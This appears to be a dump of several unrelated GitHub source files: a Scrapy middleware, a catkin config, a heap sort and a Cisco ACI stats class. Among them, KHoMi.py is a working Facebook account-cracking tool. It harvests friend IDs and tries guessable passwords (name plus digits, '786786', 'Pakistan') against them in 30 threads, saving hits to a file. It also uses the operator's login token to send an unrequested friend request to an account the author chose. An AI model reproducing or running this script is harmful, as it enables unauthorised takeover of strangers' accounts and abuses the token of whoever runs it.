788ecb8dfd993ef9d68c1c979145bef4be44c7a1 | 516dea668ccdc13397fd140f9474939fa2d7ac10 | /enterprisebanking/middlewares.py | ad1d6a91a6ff2f6a7afebb8c4d5c122ae4ea0f71 | [] | no_license | daniel-kanchev/enterprisebanking | 08f1162647a0820aafa5a939e64c1cceb7844977 | bdb7bc4676419d7dcfe47ca8e817774ad031b585 | refs/heads/main | 2023-04-09T19:29:30.892047 | 2021-04-07T08:10:15 | 2021-04-07T08:10:15 | 355,463,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,670 | py | # Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class enterprisebankingSpiderMiddleware:
    """Spider middleware for the enterprisebanking project.

    Every hook below is a pass-through implementation: responses, items
    and requests flow through unchanged, which is Scrapy's default
    behaviour when a hook is absent.
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy: build the middleware and subscribe it
        # to the spider_opened signal.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_spider_input(self, response, spider):
        # Called for each response entering the spider; returning None
        # means "continue processing".
        return None

    def process_spider_output(self, response, result, spider):
        # Forward every request/item produced by the spider, unchanged.
        for produced in result:
            yield produced

    def process_spider_exception(self, response, exception, spider):
        # Returning None lets other middlewares / Scrapy handle the error.
        return None

    def process_start_requests(self, start_requests, spider):
        # Pass the spider's start requests through untouched.
        for request in start_requests:
            yield request

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class enterprisebankingDownloaderMiddleware:
    """Downloader middleware for the enterprisebanking project.

    All hooks are pass-through implementations matching Scrapy's default
    behaviour: downloads proceed normally and responses are returned
    unchanged.
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy: build the middleware and subscribe it
        # to the spider_opened signal.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_request(self, request, spider):
        # None -> let the download proceed through the rest of the chain.
        return None

    def process_response(self, request, response, spider):
        # Hand the downloaded response back unchanged.
        return response

    def process_exception(self, request, exception, spider):
        # None -> continue normal exception processing.
        return None

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
| [
"daniel.kanchev@adata.pro"
] | daniel.kanchev@adata.pro |
80dfa387b904d7af2b4712b81c72688f68323e6c | 88819d977f39410eb55b58d6e9752e13d2562232 | /catkin-ws/build/rrbot_control/catkin_generated/pkg.installspace.context.pc.py | 327335c2ca359a670965033714ac99a77413dee2 | [] | no_license | sutkarsh-s/controls | 7b55b5399344cbdc6c8c7a46273ea70bc9e49140 | 4d16b10f72ea356e12d7c3b5db64663107b0dc61 | refs/heads/master | 2022-11-18T01:48:29.287126 | 2020-06-12T15:20:18 | 2020-06-12T15:20:18 | 264,671,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Auto-generated by catkin from pkg.context.pc.in: pkg-config context for the
# install space of the rrbot_control package. Do not edit by hand.
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []  # no exported include dirs
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')  # no catkin run dependencies
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []  # no exported libraries
PROJECT_NAME = "rrbot_control"
PROJECT_SPACE_DIR = "/home/utkarsh/catkin-ws/install"
PROJECT_VERSION = "0.0.0"
| [
"aarushsingh3006@gmail.com"
] | aarushsingh3006@gmail.com |
b896bde0dd58631301979a4950418280891ea378 | 6d3e3fdeba418e5ba488d8bdb7069f360cf62792 | /KHoMi.py | 30600b6bd9626ec4ae5dd7dcacb33863beb675d5 | [] | no_license | Cipher312365/khomi | a758ca34c0fb45f4fa99d8b43686cc5cd0929748 | bb82b53507d12025adf454d01f6e258cf17e01a7 | refs/heads/master | 2022-12-08T16:24:37.515413 | 2020-09-13T13:50:54 | 2020-09-13T13:50:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,822 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """ ▄︻┻═┳一 ЩєLc๏Mє ┼๏ ┼ђє Fąş┼єş┼ єVєr cL๏ЙIЙG
▄︻┻═┳一 ♥️KHoMi Rajput-๏FFIcIąL♥️----------🔴
▄︻┻═┳一 ♥️♥️ KHoMi - HaCkER ♥️♥️----🔴🔴
▄︻┻═┳一 💪💪DESI-BACHA💪💪 🔴🔴
▄︻┻═┳一 ---- FєєL ┼ђє P๏Щєr --------🔴🔴
ЩєLc๏Mє ┼๏ ЦЙLIMI┼єđ cL๏ЙIЙG
.-'''-.
' _ \
. . / /` '. \ __ __ ___ .--.
.'| .'| . | \ ' | |/ `.' `. |__|
.' | < | | ' | '| .-. .-. '.--.
< | | | \ \ / / | | | | | || |
| | ____ | | .'''-.`. ` ..' / | | | | | || |
| | \ .' | |/.'''. \ '-...-'` | | | | | || |
| |/ . | / | | | | | | | || |
| /\ \ | | | | |__| |__| |__||__|
| | \ \ | | | |
' \ \ \ | '. | '.
'------' '---''---' '---'
WhatsApp: 03478239915
KHoMi
▇◤▔▔▔▔▔▔▔◥▇
▇▏◥▇◣┊◢▇◤▕▇
▇▏▃▆▅▎▅▆▃▕▇
▇▏╱▔▕▎▔▔╲▕▇
▇◣◣▃▅▎▅▃◢◢▇
▇▇◣◥▅▅▅◤◢▇▇
▇▇▇◣╲▇╱◢▇▇▇
▇▇▇▇◣▇◢▇▇▇▇
ђ๏Pє Y๏Ц MąY Gє┼ ๏Ц┼ЙЦMßєrєđ ącc๏ЦЙ┼ş
P๏şşIßLY şYЙcђr๏ЙI乙єđ ßY ┼ђIş GI┼ђЦß .
♥️♥️♥️ ßєş┼ ๏F LЦcK ♥️♥️♥️
♥️♥️ rąM乙ąЙ MЦßąrąK ┼๏ єVєrY ß๏đY ♥️♥️
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92m KHoMi Rajput
\033[1;96mInstagram \033[1;93m: \033[1: itx_FaHaD_GhaFoR_ka_bhai
\033[1;96mFacebook \033[1;93m: \033[1: komail.khan.3781
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/khomiabu001/khomi
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m
.-'''-.
' _ \
. . / /` '. \ __ __ ___ .--.
.'| .'| . | \ ' | |/ `.' `. |__|
.' | < | | ' | '| .-. .-. '.--.
< | | | \ \ / / | | | | | || |
| | ____ | | .'''-.`. ` ..' / | | | | | || |
| | \ .' | |/.'''. \ '-...-'` | | | | | || |
| |/ . | / | | | | | | | || |
| /\ \ | | | | |__| |__| |__||__|
| | \ \ | | | |
' \ \ \ | '. | '.
'------' '---''---' '---'
KHoMi
▇◤▔▔▔▔▔▔▔◥▇
▇▏◥▇◣┊◢▇◤▕▇
▇▏▃▆▅▎▅▆▃▕▇
▇▏╱▔▕▎▔▔╲▕▇
▇◣◣▃▅▎▅▃◢◢▇
▇▇◣◥▅▅▅◤◢▇▇
▇▇▇◣╲▇╱◢▇▇▇
▇▇▇▇◣▇◢▇▇▇▇
WhatsApp : 03478239915
\033[1;96mAuthor \033[1;93m: \033[1;92m KHoMi Rajput
\033[1;96mInstagram \033[1;93m: \033[1;92mitx_FaHaD_GhaFoR_ka_bhai
\033[1;96mFacebook \033[1;93m: \033[1;92m KHomi Rajput
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/khomiabu001/khomi
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "khomirajput"
CorrectPassword = "iamking"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.youtube.com/channel/UCDJbhYSPToi1-CdzGLEzAIQ ')
else:
print "Wrong Username"
os.system('xdg-open https://www.youtube.com/channel/UCDJbhYSPToi1-CdzGLEzAIQ ')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/komail.khan.3781')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed Komail says Thank You♥️ \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mTHANKS FOR USING MY COMMANDS ! WE WILL BE RIGHT BACK \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
8fb5e452de9da869a55ccca9cd00839bdadeeeab | 3bfa43cd86d1fb3780f594c181debc65708af2b8 | /algorithms/sort/heap_sort.py | 0f1953ff4b5ac7e3fd902dd4f15744131c3cc8bf | [] | no_license | ninjaboynaru/my-python-demo | 2fdb6e75c88e07519d91ee8b0e650fed4a2f9a1d | d679a06a72e6dc18aed95c7e79e25de87e9c18c2 | refs/heads/master | 2022-11-06T14:05:14.848259 | 2020-06-21T20:10:05 | 2020-06-21T20:10:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,610 | py |
"""
<https://docs.python.org/3/library/heapq.html>
<https://www.youtube.com/watch?v=AEAmgbls8TM&feature=youtu.be>
Steps:
1. Put every item in the list into a heap
2. Each step get the smallest item from the heap, put the smallest into
a new list
3. Repeat until the heap is empty
```python
from heapq import heappush, heappop
This is the simple version with python module
def heap_sort(lst):
h = []
for val in lst:
heappush(h, val)
return [heappop(h) for i in range(len(h))]
```
There is also an in-place heap sort.
Steps:
1. Heapification (Bottom-up heapify the array)
1. Sink nodes in reverse order, sink(k)
2. After sinking, guaranteed that tree rooted at position k is a heap
2. Delete the head of the heap, delete the last item from the heap, swap
the last item in the root, and sink(0)
Time complexity: O(N log(N))
Space complexity: O(1)
The definition of sink(k):
Steps:
1. If the k-th item is smaller than one of its children, swap it with that child.
The children of the k-th item are at indices (2*k+1) and (2*k+2).
(If the item is smaller than both of the children, swap with the larger one.)
2. Repeat this until the end of the heap array.
Example:
3, 0, 1, 7, 9, 2
Heapify:
9
7 2
3 0 1
Delete head of heap, and sink(0):
7
3 2
1 0
Delete head of heap, and sink(0):
3
1 2
0
Delete head of heap, and sink(0):
2
1 0
Delete head of heap, and sink(0):
1
0
Delete head of heap, and sink(0):
0
"""
def heap_sort(lst):
    """Sort ``lst`` in place with an in-place max-heap heap sort.

    Steps:
    1. Bottom-up heapify: sink every node in reverse index order.
    2. Repeatedly swap the heap maximum (root) with the last unsorted
       item, shrink the heap by one, and sink the new root.

    Time complexity: O(N log N). Space: O(log N) recursion depth in sink.

    :param lst: mutable sequence of mutually comparable items; sorted
        in place (ascending). Nothing is returned.
    """

    def sink(start, end):
        """Max-heap sink: move lst[start] down until neither child
        (indices 2*start+1 and 2*start+2, bounded by ``end``) is larger.
        """
        left = 2 * start + 1
        right = 2 * start + 2
        if left > end:
            # No children inside the heap boundary; nothing to do.
            return
        # Pick the larger child that lies within the heap boundary.
        if right > end or lst[left] > lst[right]:
            swap_pos = left
        else:
            swap_pos = right
        # Bug fix: swap only when the parent actually violates the heap
        # property. The original swapped unconditionally, which could
        # destroy the heap (e.g. heap_sort([2, 1]) returned [2, 1]).
        if lst[start] < lst[swap_pos]:
            lst[start], lst[swap_pos] = lst[swap_pos], lst[start]
            sink(swap_pos, end)

    # Bottom-up heapify the array.
    for k in range(len(lst) - 1, -1, -1):
        sink(k, len(lst) - 1)

    # Delete the head of the heap: swap it with the last item of the
    # shrinking heap region, then restore the heap with sink(0).
    for end in range(len(lst) - 1, 0, -1):
        lst[0], lst[end] = lst[end], lst[0]
        sink(0, end - 1)
if __name__ == "__main__":
lst = [3, 0, 1, 7, 9, 2]
heap_sort(lst)
print(lst)
| [
"wangxin19930411@163.com"
] | wangxin19930411@163.com |
b2c6540ba4582aa077ad54bbf8c43422c96bc68e | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/comp/trnsmtderrpktshist1d.py | 132265e9aed2a406e03e9466df4b0697c29e891b | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,008 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class TrnsmtdErrPktsHist1d(Mo):
"""
A class that represents historical statistics for transmitted error packets in a 1 day sampling interval. This class updates every hour.
"""
meta = StatsClassMeta("cobra.model.comp.TrnsmtdErrPktsHist1d", "transmitted error packets")
counter = CounterMeta("error", CounterCategory.COUNTER, "packets", "transmitted error packets")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "errorCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "errorPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "errorMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "errorMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "errorAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "errorSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "errorThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "errorTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "errorRate"
meta._counters.append(counter)
counter = CounterMeta("drop", CounterCategory.COUNTER, "packets", "transmitted dropped packets")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "dropCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "dropPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "dropMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "dropMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "dropAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "dropSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "dropThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "dropTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "dropRate"
meta._counters.append(counter)
meta.moClassName = "compTrnsmtdErrPktsHist1d"
meta.rnFormat = "HDcompTrnsmtdErrPkts1d-%(index)s"
meta.category = MoCategory.STATS_HISTORY
meta.label = "historical transmitted error packets stats in 1 day"
meta.writeAccessMask = 0x1
